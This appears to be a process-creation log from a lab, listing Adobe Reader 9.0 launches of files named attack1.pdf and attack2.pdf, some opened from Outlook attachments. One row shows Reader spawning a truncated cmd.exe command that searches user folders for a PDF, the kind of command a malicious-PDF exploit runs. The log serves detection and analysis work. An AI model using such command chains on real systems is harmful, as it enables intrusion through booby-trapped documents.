42
1085081057500546091 4524 C:\\PROGRAM FILES\\ADOBE\\READER 9.0\\READER\\ACRORD32.EXE 4092 C:Program FilesAdobeReader 9.0ReaderAcroRd32.exe C:Userstarget0AppDataLocalMicrosoftWindowsTemporary Internet FilesContent.OutlookZLQAQ6V0attack1.pdf
2689584728707825576 5604 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
-442055703624529411 6008 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
4248992107858020308 1656 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
-1251998688471996907 2888 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
-826243519082053207 5320 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
6077980243373983842 3224 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe C:\\Users\\target0\\Documents\\attack1.pdf
-6280607100221359988 2804 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
-4374771076178254471 5292 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe C:\\Users\\target0\\Documents\\attack2.pdf
1158740198127345060 2320 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe C:\\Users\\target0\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Outlook\\ZLQAQ6V0\\attack1.pdf
996092377027342141 5768 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
595256785153032960 3784 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe C:\\Users\\target0\\Documents\\attack2.pdf
3240263583961572860 2312 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
2592534229832394642 2620 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
-1712245582399270207 5988 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe C:\\Users\\target0\\Documents\\attack2.pdf
5577516531178043162 3880 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
-778893165346030884 4840 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe C:\\Users\\target0\\Documents\\attack1.pdf
-3469973073291189077 2028 C:\\PROGRAM FILES\\COMMON FILES\\ADOBE\\UPDATER6\\ADOBE_UPDATER.EXE 4524 C:Program FilesCommon FilesAdobeUpdater6Adobe_Updater.exe -doActionAppID=reader9rdr-en_US
3268941686371663934 2404 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
-6390466470479412362 4348 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
8382047417699103472 4692 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
-3723048507552747752 4264 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
4944728352949920519 5480 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
6713660229818288778 4228 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
-7998448116820017966 1588 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe C:\\Users\\target0\\Documents\\attack2.pdf
2319677352076825694 2880 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
6595807136594624933 6032 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
4384309129990763096 3236 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
1444235790677617594 5744 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
218753533554751523 2948 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
3330309775169885856 6028 C:\\WINDOWS\\SYSTEM32\\CMD.EXE 4524 C:WindowsSystem32cmd.exe /Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist Desktoppdf-sample-old.pdf (cd Desktop))&(if exist My Documentspdf-sample-old.pdf (cd My Documents))&(if exist Documentspdf-sample-old.pdf (cd Documents))&(if exist Escr
-8076154174379575510 1652 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
-6118305858949935607 4092 C:\PROGRAM FILES\MICROSOFT OFFICE\OFFICE14\OUTLOOK.EXE 1 C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
5626572171415944225 2260 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe C:\\Users\\target0\\Documents\\attack2.pdf
4846420341547296388 4648 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
-1487976961720367294 3096 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
-956335601360887140 2148 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe C:\\Users\\target0\\Documents\\attack2.pdf
-1482685779515056255 2016 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
-5311308886992270674 5048 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
5452696771650563256 2568 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
6665599690112929129 2464 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
8030075415079606828 4112 C:\PROGRAM FILES\ADOBE\READER 9.0\READER\ACRORD32.EXE 1 C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe -Embedding
